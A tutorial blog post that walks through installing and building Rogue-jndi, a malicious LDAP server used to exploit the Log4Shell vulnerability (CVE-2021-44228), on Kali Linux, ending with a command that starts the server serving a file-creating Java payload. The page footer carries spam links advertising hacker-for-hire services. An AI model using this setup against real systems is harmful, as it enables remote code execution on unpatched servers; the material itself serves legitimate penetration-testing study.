Installing Rogue-jndi on Kali Linux

Installing Rogue-jndi on Kali Linux

Following the previous tutorial in which we looked at the log4j vulnerability in VMWare vSphere server, I got some questions about how to set up a malicious LDAP server on Linux. The attacker controlled LDAP server is required to provide the malicious java class (with a reverse shell for example) in response to the forged LDAP request from the server running a vulnerable version of Log4j. There are quiet a few solutions out there that provide this functionality and one of them is Rogue-jndi. Rogue-jndi is a malicious LDAP server for JNDI injection attacks. In the next section I will give a short demonstration of how to install rogue-jndi on the latest version of Kali Linux. along with the required dependencies.

To build rogue-jndi, Java v1.7+ and Maven v3+ are required on the system. Java is already installed by default so we only have to install Maven. Maven can be installed with the following commands:

sudo apt-get update
sudo apt-get install maven
Installing Rogue jndi on Kali Linux 001
Press y to install Maven.


The next step is to clone the rogue-jndi repository. We will do this at the Desktop of the Kali user and change directory to the cloned folder with the following commands:

cd Desktop
git clone https://github.com/veracode-research/rogue-jndi.git
cd rogue-jndi
Installing Rogue jndi on Kali Linux 002 1
Clone the rogue-jndi repository.

Inside the rogue-jndi folder we have to run the following command to build the rogue-jndi project which will take a minute or two to complete:

mvn package
Installing Rogue jndi on Kali Linux 003
The build process for rogue-jndi is started with the mvn package command.

The following output indicates that the build process completed successfully:

Installing Rogue jndi on Kali Linux 004
Build process completed successfully.

We can also see that the ‘target’ folder was created on our system that contains the jar file that can be executed with Java:

Installing Rogue jndi on Kali Linux 005
RogueJndi-1.1.jar was created on our system.

We can run rogue-jndi and output the usage instructions with the following command:

java -jar target/RogueJndi-1.1.jar -h
Installing Rogue jndi on Kali Linux 006
Rogue-jndi usage instructions

At this point we can start the vulnerable LDAP server with the required parameters, such as a command that will be served as Java class in response to an LDAP query. The following command starts the LDAP server and provides a Java class that creates a text file on the system as used in Log4Shell VMware vCenter Server (CVE-2021-44228):

java -jar target/RogueJndi-1.1.jar --command "touch /tmp/test.txt" --hostname "172.16.5.2"
Installing Rogue jndi on Kali Linux 007
The malicious LDAP server is running.

From here we can exploit vulnerable Log4j applications with payloads that connect to our malicious LDAP server. More detailed information on how to do this can be found in the following post:

Log4Shell VMware vCenter Server (CVE-2021-44228)

A video of the installation process can be viewed here:

Virtual Hacking Labs - Penetration testing lab

Real World Bug Bounty Techniques

Hacking Courses


Bug Bounty – An Advanced Guide to Finding Good Bugs

Real World Bug Bounty Techniques

4507878 e353 2show?id=XhHfvFHk7Zc&bids=507388

Website Hacking / Penetration Testing & Bug Bounty Hunting

Become a bug bounty hunter! Hack websites & web applications like black hat hackers and secure them like experts.

984734 90be 6show?id=XhHfvFHk7Zc&bids=507388

administrator

Leave a Reply

Your email address will not be published. Required fields are marked *

fb logo
recover dogecoin from a scam
recover ethereum from a scammer
hire a hacker to hack iphone
hire a hacker to hack snapchat
hire a hacker to hack a windows computer
error: Content is protected !!